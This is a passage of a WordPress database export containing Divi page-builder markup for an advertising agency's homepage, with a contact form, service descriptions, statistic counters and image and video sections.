text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 22:01:22','2020-07-18 22:01:22','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(356,1,'2020-07-18 22:13:07','2020-07-18 22:13:07','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" 